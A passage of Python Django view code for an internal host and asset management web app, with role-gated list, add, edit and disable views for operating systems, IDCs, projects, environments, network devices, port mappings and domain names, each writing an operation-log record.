Q(name__icontains=keyword) | Q(version__icontains=keyword) | Q(desc__icontains=keyword) | Q(
add_user__chinese_name__icontains=keyword) | Q(update_user__chinese_name__icontains=keyword))
# Count
system_nums = systems.count()
# Validate the page number
try:
page = request.GET.get('page', 1)
except PageNotAnInteger:
page = 1
# Paginate the results; remember to set the page size
p = Paginator(systems, 16, request=request)
# The paginated QuerySet
systems = p.page(page)
context = {
'web_chose_left_1': web_chose_left_1,
'web_chose_left_2': web_chose_left_2,
'web_chose_middle': web_chose_middle,
'systems': systems,
'keyword': keyword,
'system_nums': system_nums,
}
return render(request, 'host_management/other/system_list.html', context=context)
else:
return HttpResponse(status=403)
######################################
# Add operating system
######################################
class AddOSView(LoginStatusCheck, View):
def post(self, request):
if request.user.role > 1:
add_os_form = AddOsForm(request.POST)
if add_os_form.is_valid():
# Check for an identical record
name = request.POST.get('name')
version = request.POST.get('version')
bit = int(request.POST.get('bit'))
check_os = OperatingSystemInfo.objects.filter(name=name).filter(version=version).filter(bit=bit).filter(
status=1)
if check_os:
return HttpResponse('{"status":"failed", "msg":"This record already exists, please check!"}', content_type='application/json')
# Add the record
os = OperatingSystemInfo()
os.name = name
os.version = version
os.bit = bit
os.desc = request.POST.get('desc', '')
os.add_user = request.user
os.update_user = request.user
os.status = 1
os.save()
# Add operation record
op_record = UserOperationRecord()
op_record.op_user = request.user
op_record.belong = 1
op_record.status = 1
op_record.op_num = os.id
op_record.operation = 1
op_record.action = "Added operating system: %s %s ( %s )" % (os.name, os.version, os.bit)
op_record.save()
return HttpResponse('{"status":"success", "msg":"Operating system added successfully!"}', content_type='application/json')
else:
return HttpResponse('{"status":"failed", "msg":"Invalid input, please check!"}', content_type='application/json')
else:
return HttpResponse(status=403)
######################################
# Edit operating system
######################################
class EditOSView(LoginStatusCheck, View):
def post(self, request):
if request.user.role > 1:
edit_os_form = EditOsForm(request.POST)
if edit_os_form.is_valid():
os = OperatingSystemInfo.objects.get(id=int(request.POST.get('sys_id')))
os.name = request.POST.get('name')
os.version = request.POST.get('version')
os.bit = int(request.POST.get('bit'))
os.desc = request.POST.get('desc', '')
os.update_user = request.user
os.save()
# Add operation record
op_record = UserOperationRecord()
op_record.op_user = request.user
op_record.belong = 1
op_record.status = 1
op_record.op_num = os.id
op_record.operation = 2
op_record.action = "Edited operating system: %s %s ( %s )" % (os.name, os.version, os.bit)
op_record.save()
return HttpResponse('{"status":"success", "msg":"Operating system updated successfully!"}', content_type='application/json')
else:
return HttpResponse('{"status":"failed", "msg":"Invalid input, please check!"}', content_type='application/json')
else:
return HttpResponse(status=403)
######################################
# Delete operating system
######################################
class DeleteOSView(LoginStatusCheck, View):
def post(self, request):
if request.user.role > 1:
os = OperatingSystemInfo.objects.get(id=int(request.POST.get('sys_id')))
os.status = 0
os.update_user = request.user
os.save()
# Add operation record
op_record = UserOperationRecord()
op_record.op_user = request.user
op_record.belong = 1
op_record.status = 1
op_record.op_num = os.id
op_record.operation = 4
op_record.action = "Disabled operating system: %s %s ( %s )" % (os.name, os.version, os.bit)
op_record.save()
return HttpResponse('{"status":"success", "msg":"Operating system deleted successfully!"}', content_type='application/json')
else:
return HttpResponse(status=403)
######################################
# IDC management
######################################
class IdcListView(LoginStatusCheck, View):
def get(self, request):
if request.user.role > 1:
# Page selection
web_chose_left_1 = 'basic_setting'
web_chose_left_2 = 'idc'
web_chose_middle = ''
# Fetch IDCs
idcs = IdcInfo.objects.filter(status=1).order_by('-update_time')
# Keyword search
keyword = request.GET.get('keyword', '')
if keyword != '':
idcs = idcs.filter(
Q(name__icontains=keyword) | Q(address__icontains=keyword) | Q(desc__icontains=keyword) | Q(
add_user__chinese_name__icontains=keyword) | Q(update_user__chinese_name__icontains=keyword))
# Count
idc_nums = idcs.count()
# Validate the page number
try:
page = request.GET.get('page', 1)
except PageNotAnInteger:
page = 1
# Paginate the results; remember to set the page size
p = Paginator(idcs, 16, request=request)
# The paginated QuerySet
idcs = p.page(page)
context = {
'web_chose_left_1': web_chose_left_1,
'web_chose_left_2': web_chose_left_2,
'web_chose_middle': web_chose_middle,
'idcs': idcs,
'keyword': keyword,
'idc_nums': idc_nums,
}
return render(request, 'host_management/other/idc_list.html', context=context)
else:
return HttpResponse(status=403)
######################################
# Add IDC
######################################
class AddIDCView(LoginStatusCheck, View):
def post(self, request):
if request.user.role > 1:
add_idc_form = AddIdcForm(request.POST)
if add_idc_form.is_valid():
# Check for an identical record
name = request.POST.get('name')
address = request.POST.get('address')
check_idc = IdcInfo.objects.filter(name=name).filter(address=address).filter(status=1)
if check_idc:
return HttpResponse('{"status":"failed", "msg":"This record already exists, please check!"}', content_type='application/json')
# Add the record
idc = IdcInfo()
idc.name = name
idc.address = address
idc.desc = request.POST.get('desc', '')
idc.add_user = request.user
idc.update_user = request.user
idc.status = 1
idc.save()
# Add operation record
op_record = UserOperationRecord()
op_record.op_user = request.user
op_record.belong = 1
op_record.status = 1
op_record.op_num = idc.id
op_record.operation = 1
op_record.action = "Added IDC: %s" % (idc.name)
op_record.save()
return HttpResponse('{"status":"success", "msg":"IDC added successfully!"}', content_type='application/json')
else:
return HttpResponse('{"status":"failed", "msg":"Invalid input, please check!"}', content_type='application/json')
else:
return HttpResponse(status=403)
######################################
# Edit IDC
######################################
class EditIDCView(LoginStatusCheck, View):
def post(self, request):
if request.user.role > 1:
edit_idc_form = EditIdcForm(request.POST)
if edit_idc_form.is_valid():
idc = IdcInfo.objects.get(id=int(request.POST.get('idc_id')))
idc.name = request.POST.get('name')
idc.address = request.POST.get('address')
idc.desc = request.POST.get('desc', '')
idc.update_user = request.user
idc.save()
# Add operation record
op_record = UserOperationRecord()
op_record.op_user = request.user
op_record.belong = 1
op_record.status = 1
op_record.op_num = idc.id
op_record.operation = 2
op_record.action = "Edited IDC: %s" % (idc.name)
op_record.save()
return HttpResponse('{"status":"success", "msg":"IDC updated successfully!"}', content_type='application/json')
else:
return HttpResponse('{"status":"failed", "msg":"Invalid input, please check!"}', content_type='application/json')
else:
return HttpResponse(status=403)
######################################
# Delete IDC
######################################
class DeleteIDCView(LoginStatusCheck, View):
def post(self, request):
if request.user.role > 1:
idc = IdcInfo.objects.get(id=int(request.POST.get('idc_id')))
idc.status = 0
idc.update_user = request.user
idc.save()
# Add operation record
op_record = UserOperationRecord()
op_record.op_user = request.user
op_record.belong = 1
op_record.status = 1
op_record.op_num = idc.id
op_record.operation = 4
op_record.action = "Disabled IDC: %s" % (idc.name)
op_record.save()
return HttpResponse('{"status":"success", "msg":"IDC deleted successfully!"}', content_type='application/json')
else:
return HttpResponse(status=403)
######################################
# Project management
######################################
class ProjectListView(LoginStatusCheck, View):
def get(self, request):
if request.user.role > 1:
# Page selection
web_chose_left_1 = 'basic_setting'
web_chose_left_2 = 'project'
web_chose_middle = ''
# Users
users = UserProfile.objects.filter(status=1)
# Fetch projects
projects = ProjectInfo.objects.filter(status=1).order_by('-update_time')
# Keyword search
keyword = request.GET.get('keyword', '')
if keyword != '':
projects = projects.filter(
Q(name__icontains=keyword) | Q(run_env__icontains=keyword) | Q(pro_user__icontains=keyword) | Q(
add_user__chinese_name__icontains=keyword) | Q(
update_user__chinese_name__icontains=keyword) | Q(op_user__chinese_name__icontains=keyword))
# Count
project_nums = projects.count()
# Validate the page number
try:
page = request.GET.get('page', 1)
except PageNotAnInteger:
page = 1
# Paginate the results; remember to set the page size
p = Paginator(projects, 16, request=request)
# The paginated QuerySet
projects = p.page(page)
context = {
'web_chose_left_1': web_chose_left_1,
'web_chose_left_2': web_chose_left_2,
'web_chose_middle': web_chose_middle,
'users': users,
'projects': projects,
'keyword': keyword,
'project_nums': project_nums,
}
return render(request, 'host_management/other/project_list.html', context=context)
else:
return HttpResponse(status=403)
######################################
# Add project
######################################
class AddProjectView(LoginStatusCheck, View):
def post(self, request):
if request.user.role > 1:
add_project_form = AddProjectForm(request.POST)
if add_project_form.is_valid():
# Check for an identical record
name = request.POST.get('name')
check_pro = ProjectInfo.objects.filter(name=name).filter(status=1)
if check_pro:
return HttpResponse('{"status":"failed", "msg":"This record already exists, please check!"}', content_type='application/json')
# Add the record
pro = ProjectInfo()
pro.name = name
pro.pro_user = request.POST.get('pro_user')
pro.op_user_id = int(request.POST.get('op_user'))
pro.run_env = request.POST.get('run_env')
pro.add_user = request.user
pro.update_user = request.user
pro.status = 1
pro.save()
# Add operation record
op_record = UserOperationRecord()
op_record.op_user = request.user
op_record.belong = 1
op_record.status = 1
op_record.op_num = pro.id
op_record.operation = 1
op_record.action = "Added project: %s" % (pro.name)
op_record.save()
return HttpResponse('{"status":"success", "msg":"Project added successfully!"}', content_type='application/json')
else:
return HttpResponse('{"status":"failed", "msg":"Invalid input, please check!"}', content_type='application/json')
else:
return HttpResponse(status=403)
######################################
# Edit project
######################################
class EditProjectView(LoginStatusCheck, View):
def post(self, request):
if request.user.role > 1:
edit_project_form = EditProjectForm(request.POST)
if edit_project_form.is_valid():
pro = ProjectInfo.objects.get(id=int(request.POST.get('pro_id')))
pro.name = request.POST.get('name')
pro.pro_user = request.POST.get('pro_user')
pro.op_user_id = int(request.POST.get('op_user'))
pro.run_env = request.POST.get('run_env')
pro.update_user = request.user
pro.save()
# Add operation record
op_record = UserOperationRecord()
op_record.op_user = request.user
op_record.belong = 1
op_record.status = 1
op_record.op_num = pro.id
op_record.operation = 2
op_record.action = "Edited project: %s" % (pro.name)
op_record.save()
return HttpResponse('{"status":"success", "msg":"Project updated successfully!"}', content_type='application/json')
else:
return HttpResponse('{"status":"failed", "msg":"Invalid input, please check!"}', content_type='application/json')
else:
return HttpResponse(status=403)
######################################
# Delete project
######################################
class DeleteProjectView(LoginStatusCheck, View):
def post(self, request):
if request.user.role > 1:
pro = ProjectInfo.objects.get(id=int(request.POST.get('pro_id')))
pro.status = 0
pro.update_user = request.user
pro.save()
# Add operation record
op_record = UserOperationRecord()
op_record.op_user = request.user
op_record.belong = 1
op_record.status = 1
op_record.op_num = pro.id
op_record.operation = 4
op_record.action = "Disabled project: %s" % (pro.name)
op_record.save()
return HttpResponse('{"status":"success", "msg":"Project deleted successfully!"}', content_type='application/json')
else:
return HttpResponse(status=403)
######################################
# Environment management
######################################
class OpEnvListView(LoginStatusCheck, View):
def get(self, request):
if request.user.role > 1:
# Page selection
web_chose_left_1 = 'basic_setting'
web_chose_left_2 = 'env'
web_chose_middle = ''
# Fetch environments
openvs = OperatingEnvironmentInfo.objects.filter(status=1).order_by('-update_time')
# Keyword search
keyword = request.GET.get('keyword', '')
if keyword != '':
openvs = openvs.filter(
Q(name__icontains=keyword) | Q(desc__icontains=keyword) | Q(
add_user__chinese_name__icontains=keyword) | Q(
update_user__chinese_name__icontains=keyword))
# Count
openv_nums = openvs.count()
# Validate the page number
try:
page = request.GET.get('page', 1)
except PageNotAnInteger:
page = 1
# Paginate the results; remember to set the page size
p = Paginator(openvs, 16, request=request)
# The paginated QuerySet
openvs = p.page(page)
context = {
'web_chose_left_1': web_chose_left_1,
'web_chose_left_2': web_chose_left_2,
'web_chose_middle': web_chose_middle,
'openvs': openvs,
'keyword': keyword,
'openv_nums': openv_nums,
}
return render(request, 'host_management/other/openv_list.html', context=context)
else:
return HttpResponse(status=403)
######################################
# Add environment
######################################
class AddOpEnvView(LoginStatusCheck, View):
def post(self, request):
if request.user.role > 1:
add_openv_form = AddOpEnvForm(request.POST)
if add_openv_form.is_valid():
# Check for an identical record
name = request.POST.get('name')
check_openv = OperatingEnvironmentInfo.objects.filter(name=name).filter(status=1)
if check_openv:
return HttpResponse('{"status":"failed", "msg":"This record already exists, please check!"}', content_type='application/json')
# Add the record
openv = OperatingEnvironmentInfo()
openv.name = name
openv.desc = request.POST.get('desc', '')
openv.add_user = request.user
openv.update_user = request.user
openv.status = 1
openv.save()
# Add operation record
op_record = UserOperationRecord()
op_record.op_user = request.user
op_record.belong = 1
op_record.status = 1
op_record.op_num = openv.id
op_record.operation = 1
op_record.action = "Added environment: %s" % (openv.name)
op_record.save()
return HttpResponse('{"status":"success", "msg":"Environment added successfully!"}', content_type='application/json')
else:
return HttpResponse('{"status":"failed", "msg":"Invalid input, please check!"}', content_type='application/json')
else:
return HttpResponse(status=403)
######################################
# Edit environment
######################################
class EditOpEnvView(LoginStatusCheck, View):
def post(self, request):
if request.user.role > 1:
edit_openv_form = EditOpEnvForm(request.POST)
if edit_openv_form.is_valid():
openv = OperatingEnvironmentInfo.objects.get(id=int(request.POST.get('env_id')))
openv.name = request.POST.get('name')
openv.desc = request.POST.get('desc', '')
openv.update_user = request.user
openv.save()
# Add operation record
op_record = UserOperationRecord()
op_record.op_user = request.user
op_record.belong = 1
op_record.status = 1
op_record.op_num = openv.id
op_record.operation = 2
op_record.action = "Edited environment: %s" % (openv.name)
op_record.save()
return HttpResponse('{"status":"success", "msg":"Environment updated successfully!"}', content_type='application/json')
else:
return HttpResponse('{"status":"failed", "msg":"Invalid input, please check!"}', content_type='application/json')
else:
return HttpResponse(status=403)
######################################
# Delete environment
######################################
class DeleteOpEnvView(LoginStatusCheck, View):
def post(self, request):
if request.user.role > 1:
openv = OperatingEnvironmentInfo.objects.get(id=int(request.POST.get('env_id')))
openv.status = 0
openv.update_user = request.user
openv.save()
# Add operation record
op_record = UserOperationRecord()
op_record.op_user = request.user
op_record.belong = 1
op_record.status = 1
op_record.op_num = openv.id
op_record.operation = 4
op_record.action = "Disabled environment: %s" % (openv.name)
op_record.save()
return HttpResponse('{"status":"success", "msg":"Environment deleted successfully!"}', content_type='application/json')
else:
return HttpResponse(status=403)
######################################
# Use (purpose) management
######################################
class UseListView(LoginStatusCheck, View):
def get(self, request):
if request.user.role > 1:
# Page selection
web_chose_left_1 = 'basic_setting'
web_chose_left_2 = 'use'
web_chose_middle = ''
# Fetch uses
uses = UseInfo.objects.filter(status=1).order_by('-update_time')
# Keyword search
keyword = request.GET.get('keyword', '')
if keyword != '':
uses = uses.filter(
Q(name__icontains=keyword) | Q(desc__icontains=keyword) | Q(
add_user__chinese_name__icontains=keyword) | Q(
update_user__chinese_name__icontains=keyword))
# Count
use_nums = uses.count()
# Validate the page number
try:
page = request.GET.get('page', 1)
except PageNotAnInteger:
page = 1
# Paginate the results; remember to set the page size
p = Paginator(uses, 16, request=request)
# The paginated QuerySet
uses = p.page(page)
context = {
'web_chose_left_1': web_chose_left_1,
'web_chose_left_2': web_chose_left_2,
'web_chose_middle': web_chose_middle,
'uses': uses,
'keyword': keyword,
'use_nums': use_nums,
}
return render(request, 'host_management/other/use_list.html', context=context)
else:
return HttpResponse(status=403)
######################################
# Add use
######################################
class AddUseView(LoginStatusCheck, View):
def post(self, request):
if request.user.role > 1:
add_use_form = AddUseForm(request.POST)
if add_use_form.is_valid():
# Check for an identical record
name = request.POST.get('name')
check_use = UseInfo.objects.filter(name=name).filter(status=1)
if check_use:
return HttpResponse('{"status":"failed", "msg":"This record already exists, please check!"}', content_type='application/json')
# Add the record
use = UseInfo()
use.name = name
use.desc = request.POST.get('desc', '')
use.add_user = request.user
use.update_user = request.user
use.status = 1
use.save()
# Add operation record
op_record = UserOperationRecord()
op_record.op_user = request.user
op_record.belong = 1
op_record.status = 1
op_record.op_num = use.id
op_record.operation = 1
op_record.action = "Added use: %s" % (use.name)
op_record.save()
return HttpResponse('{"status":"success", "msg":"Use added successfully!"}', content_type='application/json')
else:
return HttpResponse('{"status":"failed", "msg":"Invalid input, please check!"}', content_type='application/json')
else:
return HttpResponse(status=403)
######################################
# Edit use
######################################
class EditUseView(LoginStatusCheck, View):
def post(self, request):
if request.user.role > 1:
edit_use_form = EditUseForm(request.POST)
if edit_use_form.is_valid():
use = UseInfo.objects.get(id=int(request.POST.get('use_id')))
use.name = request.POST.get('name')
use.desc = request.POST.get('desc', '')
use.update_user = request.user
use.save()
# Add operation record
op_record = UserOperationRecord()
op_record.op_user = request.user
op_record.belong = 1
op_record.status = 1
op_record.op_num = use.id
op_record.operation = 2
op_record.action = "Edited use: %s" % (use.name)
op_record.save()
return HttpResponse('{"status":"success", "msg":"Use updated successfully!"}', content_type='application/json')
else:
return HttpResponse('{"status":"failed", "msg":"Invalid input, please check!"}', content_type='application/json')
else:
return HttpResponse(status=403)
######################################
# Delete use
######################################
class DeleteUseView(LoginStatusCheck, View):
def post(self, request):
if request.user.role > 1:
use = UseInfo.objects.get(id=int(request.POST.get('use_id')))
use.status = 0
use.update_user = request.user
use.save()
# Add operation record
op_record = UserOperationRecord()
op_record.op_user = request.user
op_record.belong = 1
op_record.status = 1
op_record.op_num = use.id
op_record.operation = 4
op_record.action = "Disabled use: %s" % (use.name)
op_record.save()
return HttpResponse('{"status":"success", "msg":"Use deleted successfully!"}', content_type='application/json')
else:
return HttpResponse(status=403)
######################################
# Host operation records
######################################
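# The filters below double as documentation for the operation field:
# 1 = add, 2 = edit, 3 = enable ('up'), 4 = disable ('down'); belong=1
# appears to mark records written by this host-management module.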
class HostOperationView(LoginStatusCheck, View):
def get(self, request):
if request.user.role > 1:
# Page selection
web_chose_left_1 = 'log_management'
web_chose_left_2 = 'op_log'
web_chose_middle = ''
records = UserOperationRecord.objects.filter(belong=1).order_by('-add_time')
# Keyword search
keyword = request.GET.get('keyword', '')
if keyword != '':
records = records.filter(
Q(op_user__chinese_name=keyword) | Q(action__icontains=keyword))
# Operation type filter
user_check = request.GET.get('user_check', 'all')
# Add
if user_check == 'add':
records = records.filter(operation=1)
# Edit
if user_check == 'edit':
records = records.filter(operation=2)
# Enable
if user_check == 'up':
records = records.filter(operation=3)
# Disable
if user_check == 'down':
records = records.filter(operation=4)
# Count
record_nums = records.count()
# Validate the page number
try:
page = request.GET.get('page', 1)
except PageNotAnInteger:
page = 1
# Paginate the results; remember to set the page size
p = Paginator(records, 19, request=request)
# The paginated QuerySet
records = p.page(page)
context = {
'web_chose_left_1': web_chose_left_1,
'web_chose_left_2': web_chose_left_2,
'web_chose_middle': web_chose_middle,
'records': records,
'keyword': keyword,
'record_nums': record_nums,
'user_check': user_check,
}
return render(request, 'host_management/other/host_op_record.html', context=context)
else:
return HttpResponse(status=403)
##############################################################################
# Network asset module
##############################################################################
######################################
# Network device list
######################################
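# "Dvice" is a recurring misspelling of "Device" in these class and model
# names; the identifiers are kept as-is since urls.py and the templates
# presumably reference them.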
class NetworkDviceListView(LoginStatusCheck, View):
def get(self, request):
if request.user.role > 1:
# Page selection
web_chose_left_1 = 'host_management'
web_chose_left_2 = 'net_dvice'
web_chose_middle = ''
records = NetworkDviceInfo.objects.filter(status=1).order_by('-update_time')
# Keyword search
keyword = request.GET.get('keyword', '')
if keyword != '':
records = records.filter(
Q(category__icontains=keyword) | Q(name__icontains=keyword) | Q(desc__icontains=keyword))
# Count
record_nums = records.count()
# Validate the page number
try:
page = request.GET.get('page', 1)
except PageNotAnInteger:
page = 1
# Paginate the results; remember to set the page size
p = Paginator(records, 16, request=request)
# The paginated QuerySet
records = p.page(page)
context = {
'web_chose_left_1': web_chose_left_1,
'web_chose_left_2': web_chose_left_2,
'web_chose_middle': web_chose_middle,
'records': records,
'keyword': keyword,
'record_nums': record_nums,
}
return render(request, 'host_management/port/network_dvice_list.html', context=context)
else:
return HttpResponse(status=403)
######################################
# Add network device
######################################
class AddNetworkDviceView(LoginStatusCheck, View):
def post(self, request):
if request.user.role > 1:
name = request.POST.get('name')
ip_in = request.POST.get('ip_in')
if NetworkDviceInfo.objects.filter(name=name).filter(ip_in=ip_in).filter(status=1):
return HttpResponse('{"status":"failed", "msg":"该记录已存在,请检查!"}', content_type='application/json')
add_net_dvice_form = AddNetDviceForm(request.POST)
if add_net_dvice_form.is_valid():
net_dvice = NetworkDviceInfo()
net_dvice.category = request.POST.get('category')
net_dvice.name = name
net_dvice.ip_in = request.POST.get('ip_in')
net_dvice.ip_out = request.POST.get('ip_out', '')
net_dvice.address = request.POST.get('address')
net_dvice.admin_user = request.POST.get('admin_user')
net_dvice.admin_pass = request.POST.get('admin_pass')
net_dvice.desc = request.POST.get('desc', '')
net_dvice.add_user = request.user
net_dvice.update_user = request.user
net_dvice.status = 1
net_dvice.save()
# Add operation record
op_record = UserOperationRecord()
op_record.op_user = request.user
op_record.belong = 1
op_record.status = 1
op_record.op_num = net_dvice.id
op_record.operation = 1
op_record.action = "Added network device: %s [ %s ]" % (net_dvice.name, net_dvice.ip_in)
op_record.save()
return HttpResponse('{"status":"success", "msg":"Device added successfully!"}', content_type='application/json')
else:
return HttpResponse('{"status":"failed", "msg":"Invalid input, please check!"}', content_type='application/json')
else:
return HttpResponse(status=403)
######################################
# Edit network device
######################################
class EditNetworkDviceView(LoginStatusCheck, View):
def post(self, request):
if request.user.role > 1:
net_dvice = NetworkDviceInfo.objects.get(id=int(request.POST.get('dv_id')))
name = request.POST.get('name')
ip_in = request.POST.get('ip_in')
# Check whether the record already exists
if net_dvice.name != name:
if NetworkDviceInfo.objects.filter(name=name).filter(ip_in=ip_in).filter(status=1):
return HttpResponse('{"status":"failed", "msg":"This record already exists, please check!"}', content_type='application/json')
edit_net_dvice_form = EditNetDviceForm(request.POST)
if edit_net_dvice_form.is_valid():
net_dvice.category = request.POST.get('category')
net_dvice.name = name
net_dvice.ip_in = request.POST.get('ip_in')
net_dvice.ip_out = request.POST.get('ip_out', '')
net_dvice.address = request.POST.get('address')
net_dvice.admin_user = request.POST.get('admin_user')
net_dvice.admin_pass = request.POST.get('admin_pass')
net_dvice.desc = request.POST.get('desc', '')
net_dvice.update_user = request.user
net_dvice.save()
# Add operation record
op_record = UserOperationRecord()
op_record.op_user = request.user
op_record.belong = 1
op_record.status = 1
op_record.op_num = net_dvice.id
op_record.operation = 2
op_record.action = "Edited network device: %s [ %s ]" % (net_dvice.name, net_dvice.ip_in)
op_record.save()
return HttpResponse('{"status":"success", "msg":"Device updated successfully!"}', content_type='application/json')
else:
return HttpResponse('{"status":"failed", "msg":"Invalid input, please check!"}', content_type='application/json')
else:
return HttpResponse(status=403)
######################################
# Delete device
######################################
class DeleteNetworkDviceView(LoginStatusCheck, View):
def post(self, request):
if request.user.role > 1:
net_dvice = NetworkDviceInfo.objects.get(id=int(request.POST.get('dv_id')))
net_dvice.status = 0
net_dvice.update_user = request.user
net_dvice.save()
# Add operation record
op_record = UserOperationRecord()
op_record.op_user = request.user
op_record.belong = 1
op_record.status = 1
op_record.op_num = net_dvice.id
op_record.operation = 4
op_record.action = "Disabled network device: %s [ %s ]" % (net_dvice.name, net_dvice.ip_in)
op_record.save()
return HttpResponse('{"status":"success", "msg":"Device deleted successfully!"}', content_type='application/json')
else:
return HttpResponse(status=403)
######################################
# Port mapping list
######################################
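# A mapping pairs an external endpoint (ip_out, port_out) with an internal
# one (ip_in, port_in); uniqueness is enforced on the active internal pair.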
class PortToPortListView(LoginStatusCheck, View):
def get(self, request):
if request.user.role > 1:
# Page selection
web_chose_left_1 = 'port_domain'
web_chose_left_2 = 'port_port'
web_chose_middle = ''
records = PortToPortInfo.objects.filter(status=1).order_by('-update_time')
# Keyword search
keyword = request.GET.get('keyword', '')
if keyword != '':
records = records.filter(
Q(ip_in=keyword) | Q(port_in=keyword) | Q(ip_out=keyword) | Q(port_out=keyword) | Q(
use__icontains=keyword) | Q(desc__icontains=keyword))
# Count
record_nums = records.count()
# Validate the page number
try:
page = request.GET.get('page', 1)
except PageNotAnInteger:
page = 1
# Paginate the results; remember to set the page size
p = Paginator(records, 16, request=request)
# The paginated QuerySet
records = p.page(page)
context = {
'web_chose_left_1': web_chose_left_1,
'web_chose_left_2': web_chose_left_2,
'web_chose_middle': web_chose_middle,
'records': records,
'keyword': keyword,
'record_nums': record_nums,
}
return render(request, 'host_management/port/port_to_port_list.html', context=context)
else:
return HttpResponse(status=403)
######################################
# Add port mapping
######################################
class AddPortToPortView(LoginStatusCheck, View):
def post(self, request):
if request.user.role > 1:
ip_in = request.POST.get('ip_in')
port_in = request.POST.get('port_in')
if PortToPortInfo.objects.filter(ip_in=ip_in).filter(port_in=port_in).filter(status=1):
return HttpResponse('{"status":"failed", "msg":"该记录已存在,请检查!"}', content_type='application/json')
add_port_to_port_form = AddPortToPortForm(request.POST)
if add_port_to_port_form.is_valid():
port_info = PortToPortInfo()
port_info.ip_out = request.POST.get('ip_out', '')
port_info.port_out = request.POST.get('port_out')
port_info.ip_in = ip_in
port_info.port_in = port_in
port_info.use = request.POST.get('use')
port_info.desc = request.POST.get('desc', '')
port_info.add_user = request.user
port_info.update_user = request.user
port_info.status = 1
port_info.save()
# Add operation record
op_record = UserOperationRecord()
op_record.op_user = request.user
op_record.belong = 1
op_record.status = 1
op_record.op_num = port_info.id
op_record.operation = 1
op_record.action = "Added mapping [ %s:%s ] -> [ %s:%s ]" % (port_info.ip_out, port_info.port_out, port_info.ip_in, port_info.port_in)
op_record.save()
return HttpResponse('{"status":"success", "msg":"Mapping added successfully!"}', content_type='application/json')
else:
return HttpResponse('{"status":"failed", "msg":"Invalid input, please check!"}', content_type='application/json')
else:
return HttpResponse(status=403)
######################################
# Edit port mapping
######################################
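# Uniqueness applies to the (ip_in, port_in) pair as a whole, so the
# duplicate check below re-validates whenever either field changes.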
class EditPortToPortView(LoginStatusCheck, View):
def post(self, request):
if request.user.role > 1:
port_info = PortToPortInfo.objects.get(id=int(request.POST.get('p_id')))
ip_in = request.POST.get('ip_in')
port_in = request.POST.get('port_in')
if (port_info.ip_in != ip_in) or (port_info.port_in != port_in):
if PortToPortInfo.objects.filter(ip_in=ip_in).filter(port_in=port_in).filter(status=1):
return HttpResponse('{"status":"failed", "msg":"This record already exists, please check!"}', content_type='application/json')
edit_port_to_port_form = EditPortToPortForm(request.POST)
if edit_port_to_port_form.is_valid():
port_info.ip_out = request.POST.get('ip_out', '')
port_info.port_out = request.POST.get('port_out')
port_info.ip_in = ip_in
port_info.port_in = port_in
port_info.use = request.POST.get('use')
port_info.desc = request.POST.get('desc', '')
port_info.update_user = request.user
port_info.save()
# Add operation record
op_record = UserOperationRecord()
op_record.op_user = request.user
op_record.belong = 1
op_record.status = 1
op_record.op_num = port_info.id
op_record.operation = 2
op_record.action = "Edited mapping [ %s:%s ] -> [ %s:%s ]" % (port_info.ip_out, port_info.port_out, port_info.ip_in, port_info.port_in)
op_record.save()
return HttpResponse('{"status":"success", "msg":"Mapping updated successfully!"}', content_type='application/json')
else:
return HttpResponse('{"status":"failed", "msg":"Invalid input, please check!"}', content_type='application/json')
else:
return HttpResponse(status=403)
######################################
# Delete port mapping
######################################
class DeletePortToPortView(LoginStatusCheck, View):
def post(self, request):
if request.user.role > 1:
port_info = PortToPortInfo.objects.get(id=int(request.POST.get('p_id')))
port_info.update_user = request.user
port_info.status = 0
port_info.save()
# Add operation record
op_record = UserOperationRecord()
op_record.op_user = request.user
op_record.belong = 1
op_record.status = 1
op_record.op_num = port_info.id
op_record.operation = 4
op_record.action = "Disabled mapping [ %s:%s ] -> [ %s:%s ]" % (port_info.ip_out, port_info.port_out, port_info.ip_in, port_info.port_in)
op_record.save()
return HttpResponse('{"status":"success", "msg":"Mapping disabled successfully!"}', content_type='application/json')
else:
return HttpResponse(status=403)
######################################
# Domain name list
######################################
class DomainNameListView(LoginStatusCheck, View):
def get(self, request):
if request.user.role > 1:
# Page selection
web_chose_left_1 = 'port_domain'
web_chose_left_2 = 'domain_name'
web_chose_middle = ''
records = DomainNameInfo.objects.filter(status=1).order_by('-update_time')
# Keyword search
keyword = request.GET.get('keyword', '')
if keyword != '':
records = records.filter(
Q(name__icontains=keyword) | Q(desc__icontains=keyword))
# Count
record_nums = records.count()
# Validate the page number
try:
page = request.GET.get('page', 1)
except PageNotAnInteger:
page = 1
# Paginate the results; remember to set the page size
p = Paginator(records, 16, request=request)
# The paginated QuerySet
records = p.page(page)
context = {
'web_chose_left_1': web_chose_left_1,
'web_chose_left_2': web_chose_left_2,
'web_chose_middle': web_chose_middle,
'records': records,
'keyword': keyword,
'record_nums': record_nums,
}
return render(request, 'host_management/port/domain_name_list.html', context=context)
else:
return HttpResponse(status=403)
######################################
# Add domain name
######################################
class AddDomainNameView(LoginStatusCheck, View):
def post(self, request):
if request.user.role > 1:
name = request.POST.get('name')
if DomainNameInfo.objects.filter(name=name).filter(status=1):
return HttpResponse('{"status":"failed", "msg":"该记录已存在,请检查!"}', content_type='application/json')
add_domain_name_form = AddDomainNameForm(request.POST)
if add_domain_name_form.is_valid():
domain_info = DomainNameInfo()
domain_info.name = request.POST.get('name')
domain_info.desc = request.POST.get('desc', '')
domain_info.add_user = request.user
domain_info.update_user = request.user
domain_info.status = 1
domain_info.save()
# Add operation record
op_record = UserOperationRecord()
op_record.op_user = request.user
op_record.belong = 1
op_record.status = 1
op_record.op_num = domain_info.id
op_record.operation = 1
op_record.action = "Added domain name: %s" % domain_info.name
op_record.save()
return HttpResponse('{"status":"success", "msg":"Domain name added successfully!"}', content_type='application/json')
else:
return HttpResponse('{"status":"failed", "msg":"Invalid input, please check!"}', content_type='application/json')
else:
return HttpResponse(status=403)
######################################
# Edit domain name
######################################
class EditDomainNameView(LoginStatusCheck, View):
def post(self, request):
if request.user.role > 1:
domain_info = DomainNameInfo.objects.get(id=int(request.POST.get('do_id')))
name = request.POST.get('name')
if domain_info.name != name:
if DomainNameInfo.objects.filter(name=name).filter(status=1):
return HttpResponse('{"status":"failed", "msg":"该记录已存在,请检查!"}', content_type='application/json')
edit_domain_name_form = EditDomainNameForm(request.POST)
if edit_domain_name_form.is_valid():
domain_info.name = request.POST.get('name')
domain_info.desc = request.POST.get('desc', '')
domain_info.update_user = request.user
domain_info.save()
# Add operation record
op_record = UserOperationRecord()
op_record.op_user = request.user
op_record.belong = 1
op_record.status = 1
op_record.op_num = domain_info.id
op_record.operation = 2
op_record.action = "Edited domain name: %s" % domain_info.name
op_record.save()
